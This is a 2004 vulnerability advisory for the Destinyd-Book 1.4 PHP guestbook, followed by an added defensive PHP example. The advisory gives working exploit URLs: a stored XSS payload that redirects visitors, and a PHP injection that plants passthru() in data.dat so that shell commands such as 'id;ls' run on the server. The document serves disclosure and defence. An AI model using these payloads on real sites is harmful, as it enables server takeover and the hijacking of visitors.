XSS and command execution in Destinyd 1.4

2004-01-16T00:00:00
ID SECURITYVULNS:DOC:5641
Type securityvulns
Reporter Securityvulns
Modified 2004-01-16T00:00:00

Description

Found by: x64rst (email: x64rst@mail.ru)

XSS and command execution in Destinyd 1.4

// Destinyd-Book v1.4, Guestbook by Martijn
// http://www.destinyd.com
// The Destiny group

The script write.php does not filter the array variables it receives. With register_globals on, the query-string parameters name[], email[], pagename[], pageurl[], text[] and datum[] become the PHP arrays $name, $email, $pagename, $pageurl, $text and $datum, and write.php copies every element of them, unescaped, into double-quoted PHP strings in data/data.dat. That file starts with "<?" and is loaded as PHP code by the guestbook, so a stored entry can carry JavaScript (sent to visitors) or break out of the string and carry PHP (run on the server).

............................

    if($data)
    {
        $newtext == stripslashes($newtext);   // "==" compares instead of assigning, so stripslashes() has no effect
        fputs($data, "<? \n \$name[] = \"$newname\"; \n" . "\$email[] = \"$newemail\";\n");
        fputs($data, "\$pagename[] = \"$newpagename\"; \n" . "\$pageurl[] = \"$newpageurl\";\n" . "\$text[] = \"$newtext\";\n");
        fputs($data, "\$datum[] = \"$date\";\n");
        fclose($data);
    }

    $data = fopen("data/data.dat", "a");
    $count = "0";
    $max--;

    while($name[$count] != "")
    {
        $text[$count] == stripslashes($text[$count]);   // same "==" mistake; the other fields are never escaped at all
        fputs($data, "\$name[] = \"$name[$count]\";\n");
        fputs($data, "\$email[] = \"$email[$count]\";\n");
        fputs($data, "\$pagename[] = \"$pagename[$count]\";\n");
        fputs($data, "\$pageurl[] = \"$pageurl[$count]\";\n");
        fputs($data, "\$text[] = \"$text[$count]\";\n");
        fputs($data, "\$datum[] = \"$datum[$count]\";\n");
        $count++;
        if($count == $max)
        {
            break;
        }
    }

.....................................

Exploits:

Example: XSS

The array parameters (name[], email[], pageurl[], text[], datum[]) add a second guestbook entry whose text field holds a script tag. It is written to data.dat and output, unescaped, wherever the guestbook displays its entries.

1. www.site.com/guestbook/write.php?entry=ok&newname=vagner&newemail=vagner@hotbox.com&newtext=Speed news text please!&name[]=Bill&email[]=Bill@microsoft.com&pageurl[]=http://&text[]=hi<script>alert('Hello From x64rst@mail.ru');document.location=%27http://www.jopa.ru%27;%3C/script%3E&datum[]=07.11.2003 @ 22:07


Example: command execution

The pageurl[] value closes the double-quoted string that write.php puts around it, appends an if/passthru() statement, and opens a dummy assignment ($X64rst=") so that the closing quote and semicolon written by fputs() still leave valid PHP. The line that ends up in data.dat is:

    $pageurl[] = "http://"; if($pagename[0]!="") {passthru("$pagename[0]");} $X64rst="";

This needs the double quote to reach the file unescaped (magic_quotes_gpc off); with magic quotes on it is stored as \" and stays inside the string.

1. www.site.com/guestbook/write.php?entry=ok&newname=vagner&newemail=vagner@hotbox.com&newtext=Speed news text please!&name[]=Bill&email[]=Bill@microsoft.com&pageurl[]=http://";%20if($pagename[0]!="")%20{passthru("$pagename[0]");}%20$X64rst="&text[]=Hi you site very good!&datum[]=07.11.2003 @ 22:07

From then on every request to a page that loads data.dat runs the command given in pagename[0], which register_globals turns into $pagename[0]; here index.php returns the output of id and ls:

2. www.site.com/guestbook/index.php?pagename[0]=id;ls
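Added example, not code from Destinyd-Book or from the advisory's author: a stand-alone PHP script that builds a data.dat line the way write.php's fputs() calls do, feeds it the pageurl[] payload from the command-execution example and the text[] payload from the XSS example, and sets a hardened version beside it that stores the value with var_export(), escapes it with htmlspecialchars() on output, and takes the form fields from $_POST explicitly instead of relying on register_globals. The function names (vulnerable_line, hardened_line, display_text, entry_from_post, statement_count) and the field allow-list are assumptions made for this example; the payloads are the ones from the exploit URLs above.

```php
<?php
// Added example, not Destinyd-Book code. Shows why the advisory's pageurl[]
// payload becomes executable PHP in data.dat, and a hardened storage path.
// Function names and the field allow-list are assumptions for this example.

// Builds one line the way write.php does: the raw value is interpolated into
// a double-quoted PHP string with no escaping at all.
function vulnerable_line(string $field, string $value): string
{
    return '$' . $field . '[] = "' . $value . "\";\n";
}

// Hardened equivalent: var_export() emits a single-quoted PHP literal with
// every ' and \ backslash-escaped, so the value cannot close the string or
// add a statement. (Storing entries with serialize()/json_encode() in a file
// that is read rather than include()d avoids the problem entirely. With
// magic_quotes_gpc on, stripslashes() the request value first.)
function hardened_line(string $field, string $value): string
{
    return '$' . $field . '[] = ' . var_export($value, true) . ";\n";
}

// Output-side fix for the XSS: entry text is HTML-escaped when displayed,
// so a stored <script> tag is shown as text instead of run by the browser.
function display_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Replaces register_globals: only the five scalar form fields are taken,
// so name[]/pageurl[]/text[] arrays in the request are ignored.
function entry_from_post(array $post): array
{
    $entry = [];
    foreach (['newname', 'newemail', 'newpagename', 'newpageurl', 'newtext'] as $field) {
        $entry[$field] = isset($post[$field]) && is_string($post[$field]) ? $post[$field] : '';
    }
    return $entry;
}

// Counts top-level statements in one line of PHP with the tokenizer: a safe
// line holds exactly one, a line with injected code holds more. Semicolons
// inside string literals belong to the string token and are not counted.
function statement_count(string $php_line): int
{
    $count = 0;
    foreach (token_get_all('<?php ' . $php_line) as $token) {
        if ($token === ';') {
            $count++;
        }
    }
    return $count;
}

// pageurl[] value from the command-execution example, URL-decoded.
$payload = 'http://"; if($pagename[0]!="") {passthru("$pagename[0]");} $X64rst="';

// text[] value from the XSS example, URL-decoded; its single quotes are the
// characters var_export() has to escape.
$xss = "hi<script>alert('Hello From x64rst@mail.ru');document.location='http://www.jopa.ru';</script>";

foreach (['pageurl' => $payload, 'text' => $xss] as $field => $value) {
    $bad  = vulnerable_line($field, $value);
    $good = hardened_line($field, $value);
    echo $bad, $good;
    printf("%s: vulnerable line has %d statement(s), hardened line has %d\n",
        $field, statement_count($bad), statement_count($good));
}

// The text[] payload as a fixed guestbook page would emit it.
echo display_text($xss), "\n";

// What a fixed write.php would keep from the request: the scalar fields
// only; the pageurl array is dropped because it is not in the allow-list.
print_r(entry_from_post([
    'newname'  => 'vagner',
    'newemail' => 'vagner@hotbox.com',
    'newtext'  => 'Speed news text please!',
    'pageurl'  => [$payload],
]));
```

Run it with `php example.php`. The tokenizer count makes the difference concrete: the pageurl line built the original way parses as three statements (the assignment, the if/passthru(), and the dummy $X64rst assignment), while the var_export() line is a single assignment whose value still contains the whole payload as inert text. The XSS payload is one statement either way, which is why storage escaping alone does not fix it; display_text() is the part that neutralises it.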
